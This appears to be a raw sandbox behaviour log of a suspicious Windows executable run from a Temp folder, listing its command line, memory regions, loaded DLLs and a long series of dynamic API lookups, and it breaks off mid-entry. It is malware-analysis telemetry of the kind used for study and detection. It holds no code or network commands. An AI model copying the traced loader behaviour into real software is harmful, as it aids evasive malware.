"c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe" page_root = "0x7ea166e0" os_pid = "0xae4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xac4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 475 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 476 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 477 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 478 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 479 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 480 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 481 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 482 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 483 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 486 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 487 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 488 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 489 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 490 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 491 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 492 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 493 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 494 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 495 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 496 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 497 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 498 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 499 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 500 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 501 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 502 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 503 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 504 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 505 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 506 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 507 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 508 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 509 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 510 start_va = 0x6b0000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 511 start_va = 0x7c0000 end_va = 0x13bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 512 start_va = 0x13c0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 513 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 514 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 515 start_va = 0x1500000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 563 start_va = 0x1620000 end_va = 0x18eefff entry_point = 0x1620000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 564 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 565 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 852 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 853 start_va = 0x18f0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 854 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 855 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 867 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 889 start_va = 0x19f0000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 898 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 909 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1043 start_va = 0x19f0000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 1044 start_va = 0x1af0000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 1045 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1046 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 8 os_tid = 0xae8 [0093.722] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0093.723] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0093.724] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0093.725] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0093.726] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.727] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0093.728] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.729] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0093.729] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.730] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0093.730] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.730] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0093.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0093.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0093.730] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0093.731] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0093.731] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0093.731] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0093.731] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0093.731] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.731] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.731] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.732] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0093.732] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0093.732] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0093.732] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0093.732] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.732] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0093.732] GetProcAddress (hModule=0x76b40000, 